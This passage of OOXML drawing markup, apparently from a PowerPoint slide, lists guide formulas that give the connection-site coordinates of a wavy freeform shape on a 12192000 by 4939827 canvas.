              <a:gd name="connsiteY44" fmla="*/ 288168 h 4939827"/>
              <a:gd name="connsiteX45" fmla="*/ 9195590 w 12192000"/>
              <a:gd name="connsiteY45" fmla="*/ 279568 h 4939827"/>
              <a:gd name="connsiteX46" fmla="*/ 9219336 w 12192000"/>
              <a:gd name="connsiteY46" fmla="*/ 278133 h 4939827"/>
              <a:gd name="connsiteX47" fmla="*/ 9232362 w 12192000"/>
              <a:gd name="connsiteY47" fmla="*/ 275894 h 4939827"/>
              <a:gd name="connsiteX48" fmla="*/ 9283638 w 12192000"/>
              <a:gd name="connsiteY48" fmla="*/ 299924 h 4939827"/>
              <a:gd name="connsiteX49" fmla="*/ 9371484 w 12192000"/>
              <a:gd name="connsiteY49" fmla="*/ 329634 h 4939827"/>
              <a:gd name="connsiteX50" fmla="*/ 9404829 w 12192000"/>
              <a:gd name="connsiteY50" fmla="*/ 339038 h 4939827"/>
              <a:gd name="connsiteX51" fmla="*/ 9427021 w 12192000"/>
              <a:gd name="connsiteY51" fmla="*/ 358784 h 4939827"/>
              <a:gd name="connsiteX52" fmla="*/ 9670844 w 12192000"/>
              <a:gd name="connsiteY52" fmla="*/ 405128 h 4939827"/>
              <a:gd name="connsiteX53" fmla="*/ 9816083 w 12192000"/>
              <a:gd name="connsiteY53" fmla="*/ 416573 h 4939827"/>
              <a:gd name="connsiteX54" fmla="*/ 9936741 w 12192000"/>
              <a:gd name="connsiteY54" fmla="*/ 437044 h 4939827"/>
              <a:gd name="connsiteX55" fmla="*/ 10050093 w 12192000"/>
              <a:gd name="connsiteY55" fmla="*/ 443783 h 4939827"/>
              <a:gd name="connsiteX56" fmla="*/ 10130090 w 12192000"/>
              <a:gd name="connsiteY56" fmla="*/ 459520 h 4939827"/>
              <a:gd name="connsiteX57" fmla="*/ 10173456 w 12192000"/>
              <a:gd name="connsiteY57" fmla="*/ 457749 h 4939827"/>
              <a:gd name="connsiteX58" fmla="*/ 10218232 w 12192000"/>
              <a:gd name="connsiteY58" fmla="*/ 459820 h 4939827"/>
              <a:gd name="connsiteX59" fmla="*/ 10354176 w 12192000"/>
              <a:gd name="connsiteY59" fmla="*/ 471377 h 4939827"/>
              <a:gd name="connsiteX60" fmla="*/ 10430681 w 12192000"/>
              <a:gd name="connsiteY60" fmla="*/ 481226 h 4939827"/>
              <a:gd name="connsiteX61" fmla="*/ 10478169 w 12192000"/>
              <a:gd name="connsiteY61" fmla="*/ 481774 h 4939827"/>
              <a:gd name="connsiteX62" fmla="*/ 10540907 w 12192000"/>
              <a:gd name="connsiteY62" fmla="*/ 485607 h 4939827"/>
              <a:gd name="connsiteX63" fmla="*/ 10614941 w 12192000"/>
              <a:gd name="connsiteY63" fmla="*/ 487592 h 4939827"/>
              <a:gd name="connsiteX64" fmla="*/ 10674098 w 12192000"/>
              <a:gd name="connsiteY64" fmla="*/ 521656 h 4939827"/>
              <a:gd name="connsiteX65" fmla="*/ 10874834 w 12192000"/>
              <a:gd name="connsiteY65" fmla="*/ 574867 h 4939827"/>
              <a:gd name="connsiteX66" fmla="*/ 10944981 w 12192000"/>
              <a:gd name="connsiteY66" fmla="*/ 615042 h 4939827"/>
              <a:gd name="connsiteX67" fmla="*/ 11006376 w 12192000"/>
              <a:gd name="connsiteY67" fmla="*/ 645957 h 4939827"/>
              <a:gd name="connsiteX68" fmla="*/ 11076308 w 12192000"/>
              <a:gd name="connsiteY68" fmla="*/ 675698 h 4939827"/>
              <a:gd name="connsiteX69" fmla="*/ 11148789 w 12192000"/>
              <a:gd name="connsiteY69" fmla="*/ 685041 h 4939827"/>
              <a:gd name="connsiteX70" fmla="*/ 11249129 w 12192000"/>
              <a:gd name="connsiteY70" fmla="*/ 684218 h 4939827"/>
              <a:gd name="connsiteX71" fmla="*/ 11299915 w 12192000"/>
              <a:gd name="connsiteY71" fmla="*/ 692177 h 4939827"/>
              <a:gd name="connsiteX72" fmla="*/ 11386973 w 12192000"/>
              <a:gd name="connsiteY72" fmla="*/ 708209 h 4939827"/>
              <a:gd name="connsiteX73" fmla="*/ 11500105 w 12192000"/>
              <a:gd name="connsiteY73" fmla="*/ 735014 h 4939827"/>
              <a:gd name="connsiteX74" fmla="*/ 11621735 w 12192000"/>
              <a:gd name="connsiteY74" fmla="*/ 789584 h 4939827"/>
              <a:gd name="connsiteX75" fmla="*/ 11691200 w 12192000"/>
              <a:gd name="connsiteY75" fmla="*/ 867902 h 4939827"/>
              <a:gd name="connsiteX76" fmla="*/ 11819427 w 12192000"/>
              <a:gd name="connsiteY76" fmla="*/ 911634 h 4939827"/>
              <a:gd name="connsiteX77" fmla="*/ 11969720 w 12192000"/>
              <a:gd name="connsiteY77" fmla="*/ 964737 h 4939827"/>
              <a:gd name="connsiteX78" fmla="*/ 12055766 w 12192000"/>
              <a:gd name="connsiteY78" fmla="*/ 991268 h 4939827"/>
              <a:gd name="connsiteX79" fmla="*/ 12171539 w 12192000"/>
              <a:gd name="connsiteY79" fmla="*/ 995427 h 4939827"/>
              <a:gd name="connsiteX80" fmla="*/ 12187831 w 12192000"/>
              <a:gd name="connsiteY80" fmla="*/ 996580 h 4939827"/>
              <a:gd name="connsiteX81" fmla="*/ 12192000 w 12192000"/>
              <a:gd name="connsiteY81" fmla="*/ 996726 h 4939827"/>
              <a:gd name="connsiteX82" fmla="*/ 12192000 w 12192000"/>
              <a:gd name="connsiteY82" fmla="*/ 4939827 h 4939827"/>
              <a:gd name="connsiteX83" fmla="*/ 0 w 12192000"/>
              <a:gd name="connsiteY83" fmla="*/ 4939827 h 4939827"/>
              <a:gd name="connsiteX84" fmla="*/ 0 w 12192000"/>
              <a:gd name="connsiteY84" fmla="*/ 512043 h 4939827"/>
              <a:gd name="connsiteX85" fmla="*/ 7381 w 12192000"/>
              <a:gd name="connsiteY85" fmla="*/ 512580 h 4939827"/>
              <a:gd name="connsiteX86" fmla="*/ 100029 w 12192000"/>
              <a:gd name="connsiteY86" fmla="*/ 504758 h 4939827"/>
              <a:gd name="connsiteX87" fmla="*/ 155244 w 12192000"/>
              <a:gd name="connsiteY87" fmla="*/ 525130 h 4939827"/>
              <a:gd name="connsiteX88" fmla="*/ 254366 w 12192000"/>
              <a:gd name="connsiteY88" fmla="*/ 534449 h 4939827"/>
              <a:gd name="connsiteX89" fmla="*/ 447292 w 12192000"/>
              <a:gd name="connsiteY89" fmla="*/ 542725 h 4939827"/>
              <a:gd name="connsiteX90" fmla="*/ 628105 w 12192000"/>
              <a:gd name="connsiteY90" fmla="*/ 547853 h 4939827"/>
              <a:gd name="connsiteX91" fmla="*/ 783146 w 12192000"/>
              <a:gd name="connsiteY91" fmla="*/ 591799 h 4939827"/>
              <a:gd name="connsiteX92" fmla="*/ 1043676 w 12192000"/>
              <a:gd name="connsiteY92" fmla="*/ 591887 h 4939827"/>
              <a:gd name="connsiteX93" fmla="*/ 1281816 w 12192000"/>
              <a:gd name="connsiteY93" fmla="*/ 520946 h 4939827"/>
              <a:gd name="connsiteX94" fmla="*/ 1486347 w 12192000"/>
              <a:gd name="connsiteY94" fmla="*/ 487310 h 4939827"/>
              <a:gd name="connsiteX95" fmla="*/ 1568079 w 12192000"/>
              <a:gd name="connsiteY95" fmla="*/ 462531 h 4939827"/>
              <a:gd name="connsiteX96" fmla="*/ 1622516 w 12192000"/>
              <a:gd name="connsiteY96" fmla="*/ 466058 h 4939827"/>
              <a:gd name="connsiteX97" fmla="*/ 1655457 w 12192000"/>
              <a:gd name="connsiteY97" fmla="*/ 465359 h 4939827"/>
              <a:gd name="connsiteX98" fmla="*/ 1717454 w 12192000"/>
              <a:gd name="connsiteY98" fmla="*/ 417203 h 4939827"/>
              <a:gd name="connsiteX99" fmla="*/ 1913794 w 12192000"/>
              <a:gd name="connsiteY99" fmla="*/ 365255 h 4939827"/>
              <a:gd name="connsiteX100" fmla="*/ 2129762 w 12192000"/>
              <a:gd name="connsiteY100" fmla="*/ 367832 h 4939827"/>
              <a:gd name="connsiteX101" fmla="*/ 2376970 w 12192000"/>
              <a:gd name="connsiteY101" fmla="*/ 350129 h 4939827"/>
              <a:gd name="connsiteX102" fmla="*/ 2480155 w 12192000"/>
              <a:gd name="connsiteY102" fmla="*/ 359227 h 4939827"/>
              <a:gd name="connsiteX103" fmla="*/ 2586782 w 12192000"/>
              <a:gd name="connsiteY103" fmla="*/ 339352 h 4939827"/>
              <a:gd name="connsiteX104" fmla="*/ 2679617 w 12192000"/>
              <a:gd name="connsiteY104" fmla="*/ 305383 h 4939827"/>
              <a:gd name="connsiteX105" fmla="*/ 2788947 w 12192000"/>
              <a:gd name="connsiteY105" fmla="*/ 250375 h 4939827"/>
              <a:gd name="connsiteX106" fmla="*/ 2965530 w 12192000"/>
              <a:gd name="connsiteY106" fmla="*/ 245958 h 4939827"/>
              <a:gd name="connsiteX107" fmla="*/ 3103677 w 12192000"/>
              <a:gd name="connsiteY107" fmla="*/ 209527 h 4939827"/>
              <a:gd name="connsiteX108" fmla="*/ 3126759 w 12192000"/>
              <a:gd name="connsiteY108" fmla="*/ 211226 h 4939827"/>
              <a:gd name="connsiteX109" fmla="*/ 3164020 w 12192000"/>
              <a:gd name="connsiteY109" fmla="*/ 212779 h 4939827"/>
              <a:gd name="connsiteX110" fmla="*/ 3285019 w 12192000"/>
              <a:gd name="connsiteY110" fmla="*/ 220535 h 4939827"/>
              <a:gd name="connsiteX111" fmla="*/ 3365154 w 12192000"/>
              <a:gd name="connsiteY111" fmla="*/ 226416 h 4939827"/>
              <a:gd name="connsiteX112" fmla="*/ 3367507 w 12192000"/>
              <a:gd name="connsiteY112" fmla="*/ 225416 h 4939827"/>
              <a:gd name="connsiteX113" fmla="*/ 3387567 w 12192000"/>
              <a:gd name="connsiteY113" fmla="*/ 227103 h 4939827"/>
              <a:gd name="connsiteX114" fmla="*/ 3498001 w 12192000"/>
              <a:gd name="connsiteY114" fmla="*/ 231941 h 4939827"/>
              <a:gd name="connsiteX115" fmla="*/ 3561557 w 12192000"/>
              <a:gd name="connsiteY115" fmla="*/ 228095 h 4939827"/>
              <a:gd name="connsiteX116" fmla="*/ 3611920 w 12192000"/>
              <a:gd name="connsiteY116" fmla="*/ 218094 h 4939827"/>
              <a:gd name="connsiteX117" fmla="*/ 3620528 w 12192000"/>
              <a:gd name="connsiteY117" fmla="*/ 218788 h 4939827"/>
              <a:gd name="connsiteX118" fmla="*/ 3620766 w 12192000"/>
              <a:gd name="connsiteY118" fmla="*/ 218511 h 4939827"/>
              <a:gd name="connsiteX119" fmla="*/ 3629977 w 12192000"/>
              <a:gd name="connsiteY119" fmla="*/ 218664 h 4939827"/>
              <a:gd name="connsiteX120" fmla="*/ 3636217 w 12192000"/>
              <a:gd name="connsiteY120" fmla="*/ 220048 h 4939827"/>
              <a:gd name="connsiteX121" fmla="*/ 3709484 w 12192000"/>
              <a:gd name="connsiteY121" fmla="*/ 186927 h 4939827"/>
              <a:gd name="connsiteX122" fmla="*/ 3761342 w 12192000"/>
              <a:gd name="connsiteY122" fmla="*/ 177474 h 4939827"/>
              <a:gd name="connsiteX123" fmla="*/ 3799748 w 12192000"/>
              <a:gd name="connsiteY123" fmla="*/ 167154 h 4939827"/>
              <a:gd name="connsiteX124" fmla="*/ 3922756 w 12192000"/>
              <a:gd name="connsiteY124" fmla="*/ 194044 h 4939827"/>
              <a:gd name="connsiteX125" fmla="*/ 4028476 w 12192000"/>
              <a:gd name="connsiteY125" fmla="*/ 223679 h 4939827"/>
              <a:gd name="connsiteX126" fmla="*/ 4191582 w 12192000"/>
              <a:gd name="connsiteY126" fmla="*/ 238952 h 4939827"/>
              <a:gd name="connsiteX127" fmla="*/ 4251024 w 12192000"/>
              <a:gd name="connsiteY127" fmla="*/ 240874 h 4939827"/>
              <a:gd name="connsiteX128" fmla="*/ 4355275 w 12192000"/>
              <a:gd name="connsiteY128" fmla="*/ 260205 h 4939827"/>
              <a:gd name="connsiteX129" fmla="*/ 4423807 w 12192000"/>
              <a:gd name="connsiteY129" fmla="*/ 270366 h 4939827"/>
              <a:gd name="connsiteX130" fmla="*/ 4558432 w 12192000"/>
              <a:gd name="connsiteY130" fmla="*/ 269194 h 4939827"/>
              <a:gd name="connsiteX131" fmla="*/ 4635061 w 12192000"/>
              <a:gd name="connsiteY131" fmla="*/ 280682 h 4939827"/>
              <a:gd name="connsiteX132" fmla="*/ 4807427 w 12192000"/>
              <a:gd name="connsiteY132" fmla="*/ 276835 h 4939827"/>
              <a:gd name="connsiteX133" fmla="*/ 5028933 w 12192000"/>
              <a:gd name="connsiteY133" fmla="*/ 183887 h 4939827"/>
              <a:gd name="connsiteX134" fmla="*/ 5093642 w 12192000"/>
              <a:gd name="connsiteY134" fmla="*/ 177214 h 4939827"/>
              <a:gd name="connsiteX135" fmla="*/ 5102642 w 12192000"/>
              <a:gd name="connsiteY135" fmla="*/ 186816 h 4939827"/>
              <a:gd name="connsiteX136" fmla="*/ 5193590 w 12192000"/>
              <a:gd name="connsiteY136" fmla="*/ 156458 h 4939827"/>
              <a:gd name="connsiteX137" fmla="*/ 5323922 w 12192000"/>
              <a:gd name="connsiteY137" fmla="*/ 146332 h 4939827"/>
              <a:gd name="connsiteX138" fmla="*/ 5421860 w 12192000"/>
              <a:gd name="connsiteY138" fmla="*/ 167298 h 4939827"/>
              <a:gd name="connsiteX139" fmla="*/ 5476948 w 12192000"/>
              <a:gd name="connsiteY139" fmla="*/ 173249 h 4939827"/>
              <a:gd name="connsiteX140" fmla="*/ 5516842 w 12192000"/>
              <a:gd name="connsiteY140" fmla="*/ 184018 h 4939827"/>
              <a:gd name="connsiteX141" fmla="*/ 5619415 w 12192000"/>
              <a:gd name="connsiteY141" fmla="*/ 176781 h 4939827"/>
              <a:gd name="connsiteX142" fmla="*/ 5789867 w 12192000"/>
              <a:gd name="connsiteY142" fmla="*/ 150304 h 4939827"/>
              <a:gd name="connsiteX143" fmla="*/ 5825953 w 12192000"/>
              <a:gd name="connsiteY143" fmla="*/ 147907 h 4939827"/>
              <a:gd name="connsiteX144" fmla="*/ 5856168 w 12192000"/>
              <a:gd name="connsiteY144" fmla="*/ 158719 h 4939827"/>
              <a:gd name="connsiteX145" fmla="*/ 5862476 w 12192000"/>
              <a:gd name="connsiteY145" fmla="*/ 172447 h 4939827"/>
              <a:gd name="connsiteX146" fmla="*/ 5882195 w 12192000"/>
              <a:gd name="connsiteY146" fmla="*/ 173195 h 4939827"/>
              <a:gd name="connsiteX147" fmla="*/ 5952585 w 12192000"/>
              <a:gd name="connsiteY147" fmla="*/ 161012 h 4939827"/>
              <a:gd name="connsiteX148" fmla="*/ 6001964 w 12192000"/>
              <a:gd name="connsiteY148" fmla="*/ 154786 h 4939827"/>
              <a:gd name="connsiteX149" fmla="*/ 6184207 w 12192000"/>
              <a:gd name="connsiteY149" fmla="*/ 132658 h 4939827"/>
              <a:gd name="connsiteX150" fmla="*/ 6415830 w 12192000"/>
              <a:gd name="connsiteY150" fmla="*/ 136006 h 4939827"/>
              <a:gd name="connsiteX151" fmla="*/ 6756965 w 12192000"/>
              <a:gd name="connsiteY151" fmla="*/ 57636 h 4939827"/>
              <a:gd name="connsiteX152" fmla="*/ 6819400 w 12192000"/>
              <a:gd name="connsiteY152" fmla="*/ 30742 h 4939827"/>
              <a:gd name="connsiteX153" fmla="*/ 6986370 w 12192000"/>
              <a:gd name="connsiteY153" fmla="*/ 12659 h 4939827"/>
              <a:gd name="connsiteX154" fmla="*/ 6989536 w 12192000"/>
              <a:gd name="connsiteY154" fmla="*/ 14528 h 4939827"/>
              <a:gd name="connsiteX155" fmla="*/ 7015933 w 12192000"/>
              <a:gd name="connsiteY155" fmla="*/ 9653 h 4939827"/>
              <a:gd name="connsiteX156" fmla="*/ 7020592 w 12192000"/>
              <a:gd name="connsiteY156" fmla="*/ 1651 h 4939827"/>
              <a:gd name="connsiteX157" fmla="*/ 7025905 w 12192000"/>
              <a:gd name="connsiteY157" fmla="*/ 0 h 4939827"/>
              <a:gd name="connsiteX0" fmla="*/ 7025905 w 12192000"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 4939827"/>
              <a:gd name="connsiteX1" fmla="*/ 7032579 w 12192000"/>
              <a:gd name="connsiteY1" fmla="*/ 2808 h 4939827"/>
              <a:gd name="connsiteX2" fmla="*/ 7079505 w 12192000"/>
              <a:gd name="connsiteY2" fmla="*/ 12971 h 4939827"/>
              <a:gd name="connsiteX3" fmla="*/ 7158791 w 12192000"/>
              <a:gd name="connsiteY3" fmla="*/ 12462 h 4939827"/>
              <a:gd name="connsiteX4" fmla="*/ 7233338 w 12192000"/>
              <a:gd name="connsiteY4" fmla="*/ 24846 h 4939827"/>
              <a:gd name="connsiteX5" fmla="*/ 7259791 w 12192000"/>
              <a:gd name="connsiteY5" fmla="*/ 29557 h 4939827"/>
              <a:gd name="connsiteX6" fmla="*/ 7263923 w 12192000"/>
              <a:gd name="connsiteY6" fmla="*/ 35029 h 4939827"/>
              <a:gd name="connsiteX7" fmla="*/ 7281549 w 12192000"/>
              <a:gd name="connsiteY7" fmla="*/ 39654 h 4939827"/>
              <a:gd name="connsiteX8" fmla="*/ 7374735 w 12192000"/>
              <a:gd name="connsiteY8" fmla="*/ 65326 h 4939827"/>
              <a:gd name="connsiteX9" fmla="*/ 7376078 w 12192000"/>
              <a:gd name="connsiteY9" fmla="*/ 63849 h 4939827"/>
              <a:gd name="connsiteX10" fmla="*/ 7402026 w 12192000"/>
              <a:gd name="connsiteY10" fmla="*/ 60308 h 4939827"/>
              <a:gd name="connsiteX11" fmla="*/ 7415091 w 12192000"/>
              <a:gd name="connsiteY11" fmla="*/ 77403 h 4939827"/>
              <a:gd name="connsiteX12" fmla="*/ 7488682 w 12192000"/>
              <a:gd name="connsiteY12" fmla="*/ 83440 h 4939827"/>
              <a:gd name="connsiteX13" fmla="*/ 7732750 w 12192000"/>
              <a:gd name="connsiteY13" fmla="*/ 145456 h 4939827"/>
              <a:gd name="connsiteX14" fmla="*/ 7785900 w 12192000"/>
              <a:gd name="connsiteY14" fmla="*/ 154493 h 4939827"/>
              <a:gd name="connsiteX15" fmla="*/ 7952584 w 12192000"/>
              <a:gd name="connsiteY15" fmla="*/ 170181 h 4939827"/>
              <a:gd name="connsiteX16" fmla="*/ 8058681 w 12192000"/>
              <a:gd name="connsiteY16" fmla="*/ 219431 h 4939827"/>
              <a:gd name="connsiteX17" fmla="*/ 8126175 w 12192000"/>
              <a:gd name="connsiteY17" fmla="*/ 240005 h 4939827"/>
              <a:gd name="connsiteX18" fmla="*/ 8281371 w 12192000"/>
              <a:gd name="connsiteY18" fmla="*/ 256875 h 4939827"/>
              <a:gd name="connsiteX19" fmla="*/ 8381609 w 12192000"/>
              <a:gd name="connsiteY19" fmla="*/ 240618 h 4939827"/>
              <a:gd name="connsiteX20" fmla="*/ 8406759 w 12192000"/>
              <a:gd name="connsiteY20" fmla="*/ 232517 h 4939827"/>
              <a:gd name="connsiteX21" fmla="*/ 8426506 w 12192000"/>
              <a:gd name="connsiteY21" fmla="*/ 241842 h 4939827"/>
              <a:gd name="connsiteX22" fmla="*/ 8427949 w 12192000"/>
              <a:gd name="connsiteY22" fmla="*/ 240981 h 4939827"/>
              <a:gd name="connsiteX23" fmla="*/ 8441468 w 12192000"/>
              <a:gd name="connsiteY23" fmla="*/ 241157 h 4939827"/>
              <a:gd name="connsiteX24" fmla="*/ 8565757 w 12192000"/>
              <a:gd name="connsiteY24" fmla="*/ 255317 h 4939827"/>
              <a:gd name="connsiteX25" fmla="*/ 8573171 w 12192000"/>
              <a:gd name="connsiteY25" fmla="*/ 258426 h 4939827"/>
              <a:gd name="connsiteX26" fmla="*/ 8573548 w 12192000"/>
              <a:gd name="connsiteY26" fmla="*/ 258241 h 4939827"/>
              <a:gd name="connsiteX27" fmla="*/ 8622021 w 12192000"/>
              <a:gd name="connsiteY27" fmla="*/ 261028 h 4939827"/>
              <a:gd name="connsiteX28" fmla="*/ 8672650 w 12192000"/>
              <a:gd name="connsiteY28" fmla="*/ 254821 h 4939827"/>
              <a:gd name="connsiteX29" fmla="*/ 8785543 w 12192000"/>
              <a:gd name="connsiteY29" fmla="*/ 263406 h 4939827"/>
              <a:gd name="connsiteX30" fmla="*/ 8830588 w 12192000"/>
              <a:gd name="connsiteY30" fmla="*/ 265483 h 4939827"/>
              <a:gd name="connsiteX31" fmla="*/ 8905142 w 12192000"/>
              <a:gd name="connsiteY31" fmla="*/ 264958 h 4939827"/>
              <a:gd name="connsiteX32" fmla="*/ 8968582 w 12192000"/>
              <a:gd name="connsiteY32" fmla="*/ 262728 h 4939827"/>
              <a:gd name="connsiteX33" fmla="*/ 8972994 w 12192000"/>
              <a:gd name="connsiteY33" fmla="*/ 263284 h 4939827"/>
              <a:gd name="connsiteX34" fmla="*/ 9004605 w 12192000"/>
              <a:gd name="connsiteY34" fmla="*/ 258041 h 4939827"/>
              <a:gd name="connsiteX35" fmla="*/ 9016165 w 12192000"/>
              <a:gd name="connsiteY35" fmla="*/ 261258 h 4939827"/>
              <a:gd name="connsiteX36" fmla="*/ 9043297 w 12192000"/>
              <a:gd name="connsiteY36" fmla="*/ 281547 h 4939827"/>
              <a:gd name="connsiteX37" fmla="*/ 9048315 w 12192000"/>
              <a:gd name="connsiteY37" fmla="*/ 279264 h 4939827"/>
              <a:gd name="connsiteX38" fmla="*/ 9054706 w 12192000"/>
              <a:gd name="connsiteY38" fmla="*/ 278538 h 4939827"/>
              <a:gd name="connsiteX39" fmla="*/ 9070919 w 12192000"/>
              <a:gd name="connsiteY39" fmla="*/ 281810 h 4939827"/>
              <a:gd name="connsiteX40" fmla="*/ 9076813 w 12192000"/>
              <a:gd name="connsiteY40" fmla="*/ 283909 h 4939827"/>
              <a:gd name="connsiteX41" fmla="*/ 9085871 w 12192000"/>
              <a:gd name="connsiteY41" fmla="*/ 285133 h 4939827"/>
              <a:gd name="connsiteX42" fmla="*/ 9086159 w 12192000"/>
              <a:gd name="connsiteY42" fmla="*/ 284887 h 4939827"/>
              <a:gd name="connsiteX43" fmla="*/ 9134606 w 12192000"/>
              <a:gd name="connsiteY43" fmla="*/ 288168 h 4939827"/>
              <a:gd name="connsiteX44" fmla="*/ 9195590 w 12192000"/>
              <a:gd name="connsiteY44" fmla="*/ 279568 h 4939827"/>
              <a:gd name="connsiteX45" fmla="*/ 9219336 w 12192000"/>
              <a:gd name="connsiteY45" fmla="*/ 278133 h 4939827"/>
              <a:gd name="connsiteX46" fmla="*/ 9232362 w 12192000"/>
              <a:gd name="connsiteY46" fmla="*/ 275894 h 4939827"/>
              <a:gd name="connsiteX47" fmla="*/ 9283638 w 12192000"/>
              <a:gd name="connsiteY47" fmla="*/ 299924 h 4939827"/>
              <a:gd name="connsiteX48" fmla="*/ 9371484 w 12192000"/>
              <a:gd name="connsiteY48" fmla="*/ 329634 h 4939827"/>
              <a:gd name="connsiteX49" fmla="*/ 9404829 w 12192000"/>
              <a:gd name="connsiteY49" fmla="*/ 339038 h 4939827"/>
              <a:gd name="connsiteX50" fmla="*/ 9427021 w 12192000"/>
              <a:gd name="connsiteY50" fmla="*/ 358784 h 4939827"/>
              <a:gd name="connsiteX51" fmla="*/ 9670844 w 12192000"/>
              <a:gd name="connsiteY51" fmla="*/ 405128 h 4939827"/>
              <a:gd name="connsiteX52" fmla="*/ 9816083 w 12192000"/>
              <a:gd name="connsiteY52" fmla="*/ 416573 h 4939827"/>
              <a:gd name="connsiteX53" fmla="*/ 9936741 w 12192000"/>
              <a:gd name="connsiteY53" fmla="*/ 437044 h 4939827"/>
              <a:gd name="connsiteX54" fmla="*/ 10050093 w 12192000"/>
              <a:gd name="connsiteY54" fmla="*/ 443783 h 4939827"/>
              <a:gd name="connsiteX55" fmla="*/ 10130090 w 12192000"/>
              <a:gd name="connsiteY55" fmla="*/ 459520 h 4939827"/>
              <a:gd name="connsiteX56" fmla="*/ 10173456 w 12192000"/>
              <a:gd name="connsiteY56" fmla="*/ 457749 h 4939827"/>
              <a:gd name="connsiteX57" fmla="*/ 10218232 w 12192000"/>
              <a:gd name="connsiteY57" fmla="*/ 459820 h 4939827"/>
              <a:gd name="connsiteX58" fmla="*/ 10354176 w 12192000"/>
              <a:gd name="connsiteY58" fmla="*/ 471377 h 4939827"/>
              <a:gd name="connsiteX59" fmla="*/ 10430681 w 12192000"/>
              <a:gd name="connsiteY59" fmla="*/ 481226 h 4939827"/>
              <a:gd name="connsiteX60" fmla="*/ 10478169 w 12192000"/>
              <a:gd name="connsiteY60" fmla="*/ 481774 h 4939827"/>
              <a:gd name="connsiteX61" fmla="*/ 10540907 w 12192000"/>
              <a:gd name="connsiteY61" fmla="*/ 485607 h 4939827"/>
              <a:gd name="connsiteX62" fmla="*/ 10614941 w 12192000"/>
              <a:gd name="connsiteY62" fmla="*/ 487592 h 4939827"/>
              <a:gd name="connsiteX63" fmla="*/ 10674098 w 12192000"/>
              <a:gd name="connsiteY63" fmla="*/ 521656 h 4939827"/>
              <a:gd name="connsiteX64" fmla="*/ 10874834 w 12192000"/>
              <a:gd name="connsiteY64" fmla="*/ 574867 h 4939827"/>
              <a:gd name="connsiteX65" fmla="*/ 10944981 w 12192000"/>
              <a:gd name="connsiteY65" fmla="*/ 615042 h 4939827"/>
              <a:gd name="connsiteX66" fmla="*/ 11006376 w 12192000"/>
              <a:gd name="connsiteY66" fmla="*/ 645957 h 4939827"/>
              <a:gd name="connsiteX67" fmla="*/ 11076308 w 12192000"/>
              <a:gd name="connsiteY67" fmla="*/ 675698 h 4939827"/>
              <a:gd name="connsiteX68" fmla="*/ 11148789 w 12192000"/>
              <a:gd name="connsiteY68" fmla="*/ 685041 h 4939827"/>
              <a:gd name="connsiteX69" fmla="*/ 11249129 w 12192000"/>
              <a:gd name="connsiteY69" fmla="*/ 684218 h 4939827"/>
              <a:gd name="connsiteX70" fmla="*/ 11299915 w 12192000"/>
              <a:gd name="connsiteY70" fmla="*/ 692177 h 4939827"/>
              <a:gd name="connsiteX71" fmla="*/ 11386973 w 12192000"/>
              <a:gd name="connsiteY71" fmla="*/ 708209 h 4939827"/>
              <a:gd name="connsiteX72" fmla="*/ 11500105 w 12192000"/>
              <a:gd name="connsiteY72" fmla="*/ 735014 h 4939827"/>
              <a:gd name="connsiteX73" fmla="*/ 11621735 w 12192000"/>
              <a:gd name="connsiteY73" fmla="*/ 789584 h 4939827"/>
              <a:gd name="connsiteX74" fmla="*/ 11691200 w 12192000"/>
              <a:gd name="connsiteY74" fmla="*/ 867902 h 4939827"/>
              <a:gd name="connsiteX75" fmla="*/ 11819427 w 12192000"/>
              <a:gd name="connsiteY75" fmla="*/ 911634 h 4939827"/>
              <a:gd name="connsiteX76" fmla="*/ 11969720 w 12192000"/>
              <a:gd name="connsiteY76" fmla="*/ 964737 h 4939827"/>
              <a:gd name="connsiteX77" fmla="*/ 12055766 w 12192000"/>
              <a:gd name="connsiteY77" fmla="*/ 991268 h 4939827"/>
              <a:gd name="connsiteX78" fmla="*/ 12171539 w 12192000"/>
              <a:gd name="connsiteY78" fmla="*/ 995427 h 4939827"/>
              <a:gd name="connsiteX79" fmla="*/ 12187831 w 12192000"/>
              <a:gd name="connsiteY79" fmla="*/ 996580 h 4939827"/>
              <a:gd name="connsiteX80" fmla="*/ 12192000 w 12192000"/>
              <a:gd name="connsiteY80" fmla="*/ 996726 h 4939827"/>
              <a:gd name="connsiteX81" fmla="*/ 12192000 w 12192000"/>
              <a:gd name="connsiteY81" fmla="*/ 4939827 h 4939827"/>
              <a:gd name="connsiteX82" fmla="*/ 0 w 12192000"/>
              <a:gd name="connsiteY82" fmla="*/ 4939827 h 4939827"/>
              <a:gd name="connsiteX83" fmla="*/ 0 w 12192000"/>
              <a:gd name="connsiteY83" fmla="*/ 512043 h 4939827"/>
              <a:gd name="connsiteX84" fmla="*/ 7381 w 12192000"/>
              <a:gd name="connsiteY84" fmla="*/ 512580 h 4939827"/>
              <a:gd name="connsiteX85" fmla="*/ 100029 w 12192000"/>
              <a:gd name="connsiteY85" fmla="*/ 504758 h 4939827"/>
              <a:gd name="connsiteX86" fmla="*/ 155244 w 12192000"/>
              <a:gd name="connsiteY86" fmla="*/ 525130 h 4939827"/>
              <a:gd name="connsiteX87" fmla="*/ 254366 w 12192000"/>
              <a:gd name="connsiteY87" fmla="*/ 534449 h 4939827"/>
              <a:gd name="connsiteX88" fmla="*/ 447292 w 12192000"/>
              <a:gd name="connsiteY88" fmla="*/ 542725 h 4939827"/>
              <a:gd name="connsiteX89" fmla="*/ 628105 w 12192000"/>
              <a:gd name="connsiteY89" fmla="*/ 547853 h 4939827"/>
              <a:gd name="connsiteX90" fmla="*/ 783146 w 12192000"/>
              <a:gd name="connsiteY90" fmla="*/ 591799 h 4939827"/>
              <a:gd name="connsiteX91" fmla="*/ 1043676 w 12192000"/>
              <a:gd name="connsiteY91" fmla="*/ 591887 h 4939827"/>
              <a:gd name="connsiteX92" fmla="*/ 1281816 w 12192000"/>
              <a:gd name="connsiteY92" fmla="*/ 520946 h 4939827"/>
              <a:gd name="connsiteX93" fmla="*/ 1486347 w 12192000"/>
              <a:gd name="connsiteY93" fmla="*/ 487310 h 4939827"/>
              <a:gd name="connsiteX94" fmla="*/ 1568079 w 12192000"/>
              <a:gd name="connsiteY94" fmla="*/ 462531 h 4939827"/>
              <a:gd name="connsiteX95" fmla="*/ 1622516 w 12192000"/>
              <a:gd name="connsiteY95" fmla="*/ 466058 h 4939827"/>
              <a:gd name="connsiteX96" fmla="*/ 1655457 w 12192000"/>
              <a:gd name="connsiteY96" fmla="*/ 465359 h 4939827"/>
              <a:gd name="connsiteX97" fmla="*/ 1717454 w 12192000"/>
              <a:gd name="connsiteY97" fmla="*/ 417203 h 4939827"/>
